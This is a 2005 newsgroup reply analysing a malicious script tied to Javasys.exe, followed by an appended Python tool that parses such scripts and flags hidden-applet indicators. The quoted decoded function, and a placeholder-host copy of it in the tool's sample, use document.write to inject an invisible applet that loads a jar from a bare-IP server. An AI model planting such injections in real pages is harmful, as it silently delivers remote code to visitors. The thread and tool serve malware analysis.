Re: Javasys.exe: More of the same or new?

From: Ant (not_at_home.today)
Date: 09/07/05

  • Next message: David H. Lipman: "Re: SOPHOS Antivirus"

Date: Tue, 6 Sep 2005 23:28:33 +0100

"Mark" wrote:

> Ant wrote:
>> That's strange, I decoded the following for the above function
>> ("document.write" line wrapped, and http munged to h--p)
>>
>> function __increment_counter() {
>> document.write("<APPLET ARCHIVE=\"h--p://209.190.137.29/user/ds/c.jar\"
>> codebase=\"h--p://209.190.137.29/user/ds/\"
>> CODE=\"BB.class\" WIDTH=1 HEIGHT=1>
>> <param name=\"userid\" value=\"global/ds-1\"></APPLET>");};
>
> That is quite interesting. From what you saw, does the method of
> getting the script change which script you get?

It could do, depending on how the server is set up to respond to your
HTTP request headers. For example, some will serve different content
based on the "User-Agent" field. I only tried one method, which was to
prefix "view-source:" to the URL in the IE address box. This just
fetches (GETs) the item into notepad without running or rendering
anything in the browser.

> All I did was "wget h--p://198.88.20.158/iSponsor.js" from one of my
> linux boxes.

That's the same URL I used (without the "?bannerid=403" after it).
Perhaps the site doesn't like wget, perhaps iSponsor.js changes from
time to time, or perhaps it's something else I don't know about. You
could tell wget to use a User-Agent string like IE or Mozilla sends,
and see if it makes a difference.

> In all honesty, I was being lazy and probably shouldn't
> have posted without all the information.

Not at all; you sparked my interest to find an exploit!
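
The decoded function above is a script that uses document.write to inject a hidden APPLET tag pointing at a jar on a bare-IP host. An analyst who has saved such a script (by "view-source:" or wget, bearing in mind the thread's point that a server may hand different content to different User-Agent strings) usually wants to pull the applet's attributes out of the JavaScript string literal and flag the tell-tale traits. The following is an added example, not code from the thread or from either poster: it unescapes the document.write argument, parses the written HTML with the standard library, and reports indicators. The sample script is constructed for the example and uses a documentation-range placeholder address rather than the thread's hosts.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample in the shape of the decoded __increment_counter() function
# from the thread, joined onto one line. The host is a placeholder (RFC 5737
# documentation range), not an address that appears in the thread.
SAMPLE_JS = r'''function __increment_counter() {
document.write("<APPLET ARCHIVE=\"http://198.51.100.7/user/ds/c.jar\" codebase=\"http://198.51.100.7/user/ds/\" CODE=\"BB.class\" WIDTH=1 HEIGHT=1><param name=\"userid\" value=\"global/ds-1\"></APPLET>");};'''

# Matches document.write("...") where the literal may contain \" and other
# backslash escapes.
_DOC_WRITE = re.compile(r'document\.write\(\s*"((?:[^"\\]|\\.)*)"\s*\)', re.S)
_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def document_write_payloads(js):
    """Return the HTML strings a script passes to document.write, unescaped.

    Only the simple backslash escapes (\\", \\\\, \\/) are handled, which is
    enough for the string shape seen in the thread; \\n or \\uXXXX are not.
    """
    return [re.sub(r"\\(.)", r"\1", m.group(1)) for m in _DOC_WRITE.finditer(js)]


class AppletCollector(HTMLParser):
    """Collects <applet> start tags and the <param> children inside them."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "applet":
            # HTMLParser already lowercases tag and attribute names.
            self._current = {"attrs": dict(attrs), "params": {}, "indicators": []}
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None:
            a = dict(attrs)
            self._current["params"][a.get("name")] = a.get("value")

    def handle_endtag(self, tag):
        if tag == "applet":
            self._current = None


def indicators_for(applet):
    """Heuristic flags an analyst would note: hidden size, jar archive,
    IP-literal host. These are review prompts, not verdicts."""
    attrs = applet["attrs"]
    flags = []
    if attrs.get("width") == "1" and attrs.get("height") == "1":
        flags.append("hidden-1x1")
    archive = attrs.get("archive", "")
    if archive.lower().endswith(".jar"):
        flags.append("jar-archive")
    host = urlparse(archive).hostname or urlparse(attrs.get("codebase", "")).hostname
    if host and _IPV4.match(host):
        flags.append("ip-literal-host")
    return flags


def analyze(js):
    """Parse every document.write payload in js and describe each applet."""
    collector = AppletCollector()
    for html in document_write_payloads(js):
        collector.feed(html)
    collector.close()
    for applet in collector.applets:
        applet["indicators"] = indicators_for(applet)
    return collector.applets


if __name__ == "__main__":
    for applet in analyze(SAMPLE_JS):
        print("archive :", applet["attrs"].get("archive"))
        print("code    :", applet["attrs"].get("code"))
        print("params  :", applet["params"])
        print("flags   :", ", ".join(applet["indicators"]))
```

Run it against a saved copy of the script and compare the output of fetches made with different User-Agent strings: if the archive URL, class name or userid param differ between copies, the server is varying what it serves by client, which is the possibility raised in the reply above.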
